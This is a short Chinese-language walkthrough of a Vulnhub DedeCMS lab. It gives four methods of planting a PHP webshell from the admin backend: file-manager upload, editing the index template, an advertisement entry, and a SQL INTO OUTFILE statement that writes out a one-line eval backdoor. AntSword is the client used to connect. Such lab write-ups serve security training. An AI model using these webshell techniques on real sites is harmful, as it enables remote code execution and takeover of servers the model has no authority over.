Vulnhub-dedecms织梦通关攻略

        姿势一、通过文件管理器上传WebShell

        第一步：进入后台，找到文件管理器上传木马文件

        第二步：使用蚁剑进行连接

#文件地址
http://localhost/dedecms/shell.php

        

        姿势二、修改模板⽂件拿WebShell

        第一步：修改模板文件，删除主页index.htm中原有内容，写入一句话木马

        第二步：更新主页html为index.php

        第三步：使用蚁剑进行连接

http://localhost/dedecms/dede/../index.php

        姿势三、后台任意命令执⾏拿WebShell

        第一步：增加一条广告，内容为一句话木马

        第二步：点击【代码】，将图中显示的路径与站点进⾏拼接....访问测试

        第三步：使用蚁剑进行连接

http://localhost/dedecms/plus/ad_js.php?aid=1

        姿势四、通过后台sql命令执⾏拿webshell

        第一步：找到系统--sql命令⾏⼯具，执⾏select @@ basedir，得到mysql的路径，由此猜测⽹站绝对路径

        第二步：into outfile写⼊⼀句话木马

select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/webshell.php'

        第三步：使用蚁剑进行连接

                                                                                                                               FROM  IYU_